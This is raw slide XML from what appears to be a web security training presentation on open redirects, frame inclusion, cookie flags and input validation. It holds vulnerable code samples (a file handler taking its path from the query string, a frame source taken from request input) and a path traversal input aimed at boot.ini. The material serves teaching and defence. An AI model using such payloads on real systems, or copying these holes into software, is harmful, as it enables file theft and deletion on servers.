        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30273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 smtClean="0"/>
              <a:t>Other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30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Other Attacks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739211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Site redirection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>User supplied input used as target page</a:t>
            </a:r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r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>Can be used in phishing and scam attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>Page inclusion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>User supplied input use as source for frame, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" err="1" smtClean="0"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>, image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571500" y="2438400"/>
            <a:ext cx="5643563" cy="642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http://site.com/login.php?redirect=&lt;value&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ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3688" y="1214438"/>
            <a:ext cx="2286000" cy="1643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Microsoft Still Do This In Versions Of OWA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" y="4414838"/>
            <a:ext cx="4643438" cy="2214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&lt;frameset&gt;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    &lt;frame </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="topbar.html"&gt;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    &lt;frameset&gt;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        &lt;frame </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="&lt;%=request("page")%&gt;"&gt;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    &lt;/frameset&gt;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&lt;/frameset&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" sz="2000" b="1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143625" y="4843463"/>
            <a:ext cx="2714625" cy="1000125"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -87607"/>
              <a:gd name="adj2" fmla="val 318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External Content Displayed In Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22401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Cookie Security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523768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Don’t store credentials in the cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>Set-cookie: user=admin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>Set the cookie path</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>Specifies which part of the application the cookie is sent to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangular Callout 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6115050" y="1371600"/>
            <a:ext cx="2714625" cy="1000125"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -88660"/>
              <a:gd name="adj2" fmla="val 2234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This Sort Of Thing Still Happens!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88" y="3309938"/>
            <a:ext cx="2071687" cy="2143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http://Application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428875" y="3309938"/>
            <a:ext cx="3500438" cy="1000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Secured Blog Posting Section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http://Application/secure/login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8875" y="4452938"/>
            <a:ext cx="3500438" cy="1000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Insecure General Section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http://Application/general/read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786563" y="3238500"/>
            <a:ext cx="2071687" cy="1000125"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -88660"/>
              <a:gd name="adj2" fmla="val 2234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Requires Auth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Cookie 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7188" y="5629275"/>
            <a:ext cx="8501062" cy="1000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If The Cookie Path Is Not Set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A Vulnerability In The General Section Can Read The Secure Section Cookie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28292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 smtClean="0"/>
              <a:t>Common Web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00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14375"/>
            <a:ext cx="8229600" cy="5715000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Set the SECURE flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>Prevents the cookie been sent in HTTP requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>Cookie sent even if target site not listening on HTTP</a:t>
            </a:r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r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>Set the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" err="1" smtClean="0"/>
              <a:t>HTTPOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t> Flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>Prevents access to the cookie through JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>Defence against cross site scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2560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28625"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" smtClean="0"/>
              <a:t>Cookie Security</a:t>
            </a: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928813"/>
            <a:ext cx="4938712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6715125" y="2571750"/>
            <a:ext cx="2071688" cy="1571625"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -96936"/>
              <a:gd name="adj2" fmla="val -311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Attacker Needs Access To Sniff The Traffic</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32533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Q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60375" y="1643063"/>
            <a:ext cx="7424841" cy="4508355"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 643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7450" y="1705882"/>
            <a:ext cx="6991350" cy="44173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public class CrystalImageHandler : WebControl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private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string tmpdir = null;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protected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override void Render(HtmlTextWriter writer)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string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filepath;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string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dynamicImage = </a:t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  (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string)Context.Request.QueryString.Get("dynamicimage");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if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(tmpdir == null)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    tmpdir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= ViewerGlobal.GetImageDirectory();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}</a:t>
            </a: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filePath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= tmpdir + dynamicImage;</a:t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FileStream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imagestream = </a:t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  new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FileStream (filePath, FileMode.Open, FileAccess.Read);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//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stream file to user</a:t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File.Delete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(filePath);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}</a:t>
            </a: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232150" y="2650444"/>
            <a:ext cx="184731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endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC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733801" y="4648204"/>
            <a:ext cx="5029200" cy="1760466"/>
            <a:chOff x="1457864" y="5469147"/>
            <a:chExt cx="7522234" cy="845961"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Rounded Rectangle 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1457864" y="5469147"/>
              <a:ext cx="7522234" cy="71599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657881" y="5618515"/>
              <a:ext cx="7033111" cy="69659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 marL="114300" lvl="1" algn="l">
                <a:spcAft>
                  <a:spcPct val="30000"/>
                </a:spcAft>
                <a:buClr>
                  <a:schemeClr val="accent2"/>
                </a:buClr>
                <a:buSzPct val="80000"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>File: crystalimagehandler.aspx</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="114300" lvl="1" algn="l">
                <a:spcAft>
                  <a:spcPct val="30000"/>
                </a:spcAft>
                <a:buClr>
                  <a:schemeClr val="accent2"/>
                </a:buClr>
                <a:buSzPct val="80000"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Vulnerabilites</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> ?</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="114300" lvl="1" algn="l">
                <a:spcAft>
                  <a:spcPct val="30000"/>
                </a:spcAft>
                <a:buClr>
                  <a:schemeClr val="accent2"/>
                </a:buClr>
                <a:buSzPct val="80000"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Payload Attack ?</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="114300" lvl="1" algn="l">
                <a:spcAft>
                  <a:spcPct val="30000"/>
                </a:spcAft>
                <a:buClr>
                  <a:schemeClr val="accent2"/>
                </a:buClr>
                <a:buSzPct val="80000"/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Sego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98062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60375" y="1643063"/>
            <a:ext cx="7424841" cy="4508355"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 643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7450" y="1705882"/>
            <a:ext cx="6991350" cy="44173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public class CrystalImageHandler : WebControl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private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string tmpdir = null;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protected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override void Render(HtmlTextWriter writer)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string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filepath;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string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dynamicImage = </a:t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  (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string)Context.Request.QueryString.Get("dynamicimage");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if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(tmpdir == null)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    tmpdir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= ViewerGlobal.GetImageDirectory();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}</a:t>
            </a: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filePath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= tmpdir + dynamicImage;</a:t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FileStream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imagestream = </a:t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  new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FileStream (filePath, FileMode.Open, FileAccess.Read);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//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stream file to user</a:t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File.Delete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(filePath);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}</a:t>
            </a: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232150" y="2650444"/>
            <a:ext cx="2628989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rgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(1) Get filename from querystring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063875" y="3976006"/>
            <a:ext cx="1128835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rgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(2) Open file 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806325" y="5099956"/>
            <a:ext cx="1213153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rgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(4) Delete file!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41000" y="5903002"/>
            <a:ext cx="6448975" cy="715993"/>
            <a:chOff x="1451623" y="5469147"/>
            <a:chExt cx="7528475" cy="715993"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Rounded Rectangle 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1457864" y="5469147"/>
              <a:ext cx="7522234" cy="71599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451623" y="5608490"/>
              <a:ext cx="7239371" cy="369332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 marL="114300" lvl="1" algn="l">
                <a:spcAft>
                  <a:spcPct val="30000"/>
                </a:spcAft>
                <a:buClr>
                  <a:schemeClr val="accent2"/>
                </a:buClr>
                <a:buSzPct val="80000"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>crystalimagehandler.aspx?dynamicimage=..\..\boot.ini</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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057275" y="4569731"/>
            <a:ext cx="1785745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rgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(3) Stream file to user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013699" y="3428133"/>
            <a:ext cx="2676276" cy="914400"/>
            <a:chOff x="5994399" y="3256401"/>
            <a:chExt cx="2676276" cy="914400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="Striped Right Arrow 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="12087117">
              <a:off x="5994399" y="3282888"/>
              <a:ext cx="2226547" cy="428625"/>
            </a:xfrm>
            <a:prstGeom prst="striped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15" descr="Funny Guy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56275" y="3256401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998062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0" grpId="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="21" grpId="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="2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5408" y="-97713"/>
            <a:ext cx="5257800" cy="6621462"/>
            <a:chOff x="1600200" y="-373063"/>
            <a:chExt cx="6858000" cy="8137526"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="92162" name="Picture 2" descr="Clipboard with pencil OS12049"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3" cstate="print">
              <a:lum contrast="6000"/>
            </a:blip>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm rot="527784">
              <a:off x="1600200" y="-373063"/>
              <a:ext cx="6858000" cy="8137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5715" name="Rectangle 3"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="547470">
              <a:off x="2182813" y="1445358"/>
              <a:ext cx="5576887" cy="1805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l" eaLnBrk="1" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="85000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="40000"/>
                </a:spcBef>
                <a:buClr>
                  <a:srgbClr val="006600"/>
                </a:buClr>
                <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                <a:buChar char="þ"/>
                <a:defRPr/>
              </a:pP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radley Hand ITC" pitchFamily="66" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="342900" indent="-342900" algn="l" eaLnBrk="1" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="85000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="40000"/>
                </a:spcBef>
                <a:buClr>
                  <a:srgbClr val="006600"/>
                </a:buClr>
                <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                <a:buChar char="þ"/>
                <a:defRPr/>
              </a:pP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Bradley Hand ITC" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>All input is </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" u="sng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Bradley Hand ITC" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>evil</a:t>
              </a:r>
              <a:r>
                <a:rPr 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Bradley Hand ITC" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>!!!!!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Bradley Hand ITC" pitchFamily="66" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="342900" indent="-342900" algn="l" eaLnBrk="1" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="85000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="40000"/>
                </a:spcBef>
                <a:buClr>
                  <a:srgbClr val="006600"/>
                </a:buClr>
                <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                <a:buChar char="þ"/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr 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Bradley Hand ITC" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>Don't </a:t>
              </a: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Bradley Hand ITC" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>look for </a:t>
              </a:r>
              <a:r>
                <a:rPr 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Bradley Hand ITC" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>"bad" </a:t>
              </a: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Bradley Hand ITC" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>things!</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="342900" indent="-342900" algn="l" eaLnBrk="1" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="85000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="40000"/>
                </a:spcBef>
                <a:buClr>
                  <a:srgbClr val="006600"/>
                </a:buClr>
                <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                <a:buChar char="þ"/>
                <a:defRPr/>
              </a:pP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radley Hand ITC" pitchFamily="66" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="92164" name="Rectangle 4"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="536263">
              <a:off x="2341971" y="1186892"/>
              <a:ext cx="4612886" cy="718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3200" u="sng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adley Hand ITC" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>Input Error Checklist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2190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83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User Supplied Input Is The Cause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NZ" dirty="0" smtClean="0"/>
              <a:t>Comes from many places</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>Passed on the URL, or as a parameter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>Passed in posted data, hidden fields</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>Passed in HTTP headers, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" err="1" smtClean="0"/>
              <a:t>referer</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>Cookie data, client certificates, files for import, etc..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-NZ" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"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642938" y="3505200"/>
            <a:ext cx="7786687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THE USER CAN NOT BE TRUSTED... EVER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3929063"/>
            <a:ext cx="8229600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NZ" sz="2400" b="1" dirty="0">
                <a:latin typeface="Eurostile" pitchFamily="34" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Validate ALL user input, server side</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="270000" lvl="1" indent="-180000">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Eurostile" pitchFamily="34" charset="0"/>
              <a:buChar char=":"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Eurostile" pitchFamily="34" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Cint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Eurostile" pitchFamily="34" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Eurostile" pitchFamily="34" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>isDate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Eurostile" pitchFamily="34" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Eurostile" pitchFamily="34" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Eurostile" pitchFamily="34" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>() &lt;= x, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Eurostile" pitchFamily="34" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>isAlphaNumeric</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Eurostile" pitchFamily="34" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>() </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="270000" lvl="1" indent="-180000">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Eurostile" pitchFamily="34" charset="0"/>
              <a:buChar char=":"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Eurostile" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Whitelist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Eurostile" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, NOT blacklist</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="270000" lvl="1" indent="-180000">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Eurostile" pitchFamily="34" charset="0"/>
              <a:buChar char=":"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Eurostile" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Decode input, in the correct order, and in the right case</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="270000" lvl="1" indent="-342000">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" sz="2400" b="1" dirty="0">
                <a:latin typeface="Eurostile" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Filter Output at use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="270000" lvl="1" indent="-180000">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Eurostile" pitchFamily="34" charset="0"/>
              <a:buChar char=":"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Eurostile" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Different uses of data, require different filters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="270000" lvl="1" indent="-180000">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Eurostile" pitchFamily="34" charset="0"/>
              <a:buChar char=":"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-NZ" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Eurostile" pitchFamily="34" charset="0"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="270000" lvl="1" indent="-180000">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Eurostile" pitchFamily="34" charset="0"/>
              <a:buChar char=":"/>
              <a:defRPr/>
            </a:pPr>
